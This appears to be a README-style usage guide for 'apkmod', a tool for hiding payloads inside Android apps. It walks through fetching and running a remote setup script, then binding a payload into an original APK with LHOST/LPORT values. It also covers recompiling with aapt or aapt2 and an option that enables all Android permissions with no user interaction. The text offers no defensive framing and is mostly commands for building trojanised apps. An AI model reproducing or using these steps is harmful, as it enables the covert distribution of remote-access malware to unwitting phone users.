- First goto home directory
$ cd $HOME
- Get the setup script
$ wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh
- Execute the script
$ sh setup.sh
- Now you can execute command
$ apkmod
- For binding
$ apkmod -b /path/to/originalApp.apk -o /path/to/binded.apk LHOST=127.0.0.1 LPORT=4444
. It will bind payload with originalApp.apk and saves final binded app to binded.apk. - Now you can use a optional option
-a
to use aapt2 for binding and recompiling. Why aapt2 ? Because some apps can't recompile with aapt but aapt2 can do it. But I can't drop aapt support because some apps can't recompile with aapt2 so first recompile or bind without aapt2 (-a
) then if you failed then try with aapt2. For example$ apkmod -a -b /path/to/originalApp.apk -o /path/to/binded.apk LHOST=127.0.0.1 LPORT=4444
. - Use
-V
to enable verbose output - If only editing Java (smali) then this is the recommended action for faster decompile & rebuild
--no-res
- If you are only editing the resources. This is the recommended action for faster disassemble & assemble
--no-smali
- use
--frame-path
to specify framework directory like--frame-path=/path/to/dir
- Use
--enable-perm
to enable all android permissions in binded or non binded payloads without user interaction. For example :-$ apkmod --enable-perm=/path/to/binded.apk -o mybinded.apk